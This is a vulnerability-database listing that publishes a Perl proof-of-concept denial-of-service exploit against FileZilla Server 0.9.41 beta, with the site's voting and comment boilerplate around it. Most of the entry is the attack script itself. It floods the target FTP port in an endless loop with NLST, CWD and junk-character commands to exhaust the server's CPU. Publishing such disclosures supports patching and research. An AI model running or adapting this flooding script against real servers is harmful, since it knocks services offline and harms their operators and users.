FileZilla Server version 0.9.41 beta Remote DOS (CPU exhaustion) POC

2012.07.12
Credit: coolkaveh
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-399

# Exploit Title:FileZilla Server version 0.9.41 beta Remote DOS (CPU exhaustion) POC # Date: July 10, 2012 # Author: coolkaveh # coolkaveh () rocketmail com # https://twitter.com/coolkaveh # Vendor Homepage: http://filezilla-project.org/ # Version: 0.9.41 # Tested on: windows XP SP3 #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Crappy FileZilla Server (CPU exhaustion) #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #!/usr/bin/perl -w use IO::Socket; $|=1; sub usage { print "Crappy FTP Server Remote Denial Of Service\n"; print "by coolkaveh\n"; print "coolkaveh () rocketmail com\n"; print "usage: perl Crappyftp.pl <host> \n"; } $host=shift; $port=shift || "21"; if(!defined($host)){ print "Crappy FTP Server Remote Denial Of Service\n"; print "by coolkaveh\n"; print "coolkaveh () rocketmail com\n"; print "usage: perl Crappyftp.pl <host> \n"; exit(0); } $check_first=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60); if(defined $check_first){ print "$host -> $port is alive.\n"; $check_first->close; } else{ die("$host -> $port is closed!\n"); } @command=( 'NLST','CWD','%$^&*()_+!@'); print "Dosing Server!\n"; while (1) { COMMAND_LIST: foreach $cmd (@command){ LABEL5: $sock1=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>'tcp', Timeout=>30); if(defined($sock1)){ $sock1->send("$cmd"." "."$poc\r\n", 0); } } }

References:

http://filezilla-project.org/
https://twitter.com/coolkaveh


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top